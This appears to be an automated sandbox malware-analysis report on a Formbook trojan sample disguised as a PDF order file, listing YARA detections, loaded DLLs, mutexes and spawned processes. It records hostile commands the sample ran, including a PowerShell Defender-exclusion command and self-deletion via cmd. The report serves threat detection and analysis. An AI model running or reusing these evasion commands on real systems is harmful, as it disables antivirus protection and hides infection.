Source: 00000008.00000002.4540554051.0000000002B30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.4551128208.000000000F01C000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
Source: 00000008.00000002.4541049594.00000000046D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.4541049594.00000000046D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.4541049594.00000000046D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2165863634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.2165863634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.2165863634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.2127105917.0000000003E2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.2127105917.0000000003E2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.2127105917.0000000003E2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: ORDER_1105-19-24-3537.pdf.exe PID: 6508, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: ORDER_1105-19-24-3537.pdf.exe PID: 6644, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: rundll32.exe PID: 1576, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: ORDER_1105-19-24-3537.pdf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.7680000.3.raw.unpack, SA60ufIefZnjwEFT2L.cs	Security API names: _0020.SetAccessControl
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.7680000.3.raw.unpack, SA60ufIefZnjwEFT2L.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.7680000.3.raw.unpack, SA60ufIefZnjwEFT2L.cs	Security API names: _0020.AddAccessRule
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f23b00.1.raw.unpack, SA60ufIefZnjwEFT2L.cs	Security API names: _0020.SetAccessControl
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f23b00.1.raw.unpack, SA60ufIefZnjwEFT2L.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f23b00.1.raw.unpack, SA60ufIefZnjwEFT2L.cs	Security API names: _0020.AddAccessRule
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f23b00.1.raw.unpack, KmBHChENhiSgkuxeS2.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.7680000.3.raw.unpack, KmBHChENhiSgkuxeS2.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f93720.0.raw.unpack, KmBHChENhiSgkuxeS2.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f93720.0.raw.unpack, SA60ufIefZnjwEFT2L.cs	Security API names: _0020.SetAccessControl
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f93720.0.raw.unpack, SA60ufIefZnjwEFT2L.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f93720.0.raw.unpack, SA60ufIefZnjwEFT2L.cs	Security API names: _0020.AddAccessRule

Source: classification engine

Classification label: mal100.troj.evad.winEXE@11/6@11/4

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 8_2_00A03C66 LoadLibraryExW,GetLastError,FormatMessageW,RtlImageNtHeader,SetProcessMitigationPolicy,

8_2_00A03C66

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 8_2_00A0205A CoCreateInstance,

8_2_00A0205A

Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ORDER_1105-19-24-3537.pdf.exe.log

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Mutant created: \Sessions\1\BaseNamedObjects\zxEnLL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7148:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mluqbrvl.cef.ps1

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Command line argument: WLDP.DLL		8_2_00A04136
Source: C:\Windows\SysWOW64\rundll32.exe	Command line argument: localserver		8_2_00A04136

Source: ORDER_1105-19-24-3537.pdf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: ORDER_1105-19-24-3537.pdf.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\explorer.exe

Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"

Source: ORDER_1105-19-24-3537.pdf.exe	ReversingLabs: Detection: 68%
Source: ORDER_1105-19-24-3537.pdf.exe	Virustotal: Detection: 70%

Source: unknown	Process created: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe "C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe"
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe"
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Process created: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe "C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe"
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe"	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Process created: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe "C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe"	Jump to behavior

Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.schema.shell.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mfsrcsnk.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: ORDER_1105-19-24-3537.pdf.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: ORDER_1105-19-24-3537.pdf.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: ORDER_1105-19-24-3537.pdf.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: NgWS.pdb source: ORDER_1105-19-24-3537.pdf.exe
Source:	Binary string: wntdll.pdbUGP source: ORDER_1105-19-24-3537.pdf.exe, 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2166507711.00000000045D8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2169166091.0000000004784000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.4541336053.0000000004ACE000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.4541336053.0000000004930000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: ORDER_1105-19-24-3537.pdf.exe, ORDER_1105-19-24-3537.pdf.exe, 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 00000008.00000003.2166507711.00000000045D8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2169166091.0000000004784000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.4541336053.0000000004ACE000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.4541336053.0000000004930000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: rundll32.pdb source: ORDER_1105-19-24-3537.pdf.exe, 00000004.00000002.2166313350.0000000000CBD000.00000004.00000020.00020000.00000000.sdmp, ORDER_1105-19-24-3537.pdf.exe, 00000004.00000002.2166669799.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, rundll32.exe, rundll32.exe, 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: rundll32.pdbGCTL source: ORDER_1105-19-24-3537.pdf.exe, 00000004.00000002.2166313350.0000000000CBD000.00000004.00000020.00020000.00000000.sdmp, ORDER_1105-19-24-3537.pdf.exe, 00000004.00000002.2166669799.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, rundll32.exe, 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: NgWS.pdbSHA256 source: ORDER_1105-19-24-3537.pdf.exe

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f23b00.1.raw.unpack, SA60ufIefZnjwEFT2L.cs	.Net Code: xokE9SrNrX System.Reflection.Assembly.Load(byte[])
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.7680000.3.raw.unpack, SA60ufIefZnjwEFT2L.cs	.Net Code: xokE9SrNrX System.Reflection.Assembly.Load(byte[])
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f93720.0.raw.unpack, SA60ufIefZnjwEFT2L.cs	.Net Code: xokE9SrNrX System.Reflection.Assembly.Load(byte[])

Source: ORDER_1105-19-24-3537.pdf.exe

Static PE information: 0x8C1323AF [Mon Jun 20 19:42:39 2044 UTC]

Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 0_2_07614130 push eax; retf	0_2_07614131
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_00416897 push ds; ret	4_2_0041689F
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0040ABD9 pushfd ; retf	4_2_0040ABDA
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0041644F pushfd ; iretd	4_2_00416450
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0041D4F2 push eax; ret	4_2_0041D4F8
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0041D4FB push eax; ret	4_2_0041D562
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0041D4A5 push eax; ret	4_2_0041D4F8
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0041D55C push eax; ret	4_2_0041D562
